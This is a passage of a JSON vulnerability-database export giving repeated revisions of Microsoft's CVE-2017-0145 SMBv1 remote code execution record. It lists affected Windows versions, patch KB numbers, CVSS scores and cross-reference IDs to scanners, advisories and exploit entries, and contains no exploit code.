["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T18:46:16", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-05T18:46:16", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB3210720", "KB3210721", "KB3212646", "KB4013198", "KB4013429", "KB4012217", "KBMS16-110, 3187754", "KB4014077", "KB4012216", "KB3205401", "KB4012212", "KB4012606", "KB4012598", "KB3205409", "KB4012215", "KB3177186", "KB4012213", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T18:46:16", "differentElements": ["msAffectedSoftware"], "edition": 13}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-05T20:48:26", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T20:48:26", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-05T20:48:26", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB4013429", "KB3210720", "KB4012215", "KB3213986", "KB4012217", "KB4012598", "KB3205409", "KB3177186", "KB4012606", "KB4012214", "KB4012212", "KB3210721", "KB4012216", "KB3205401", "KB3212646", "KB4012213", "KB4014077", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T20:48:26", "differentElements": ["msAffectedSoftware"], "edition": 14}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-06T10:43:29", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T10:43:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-06T10:43:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012606", "KB4012598", "KB4012215", "KB4012217", "KB3213986", "KB3205401", "KB3177186", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4014077", "KB4013198", "KB4012212", "KB3210720", "KB4012214", "KB3212646", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 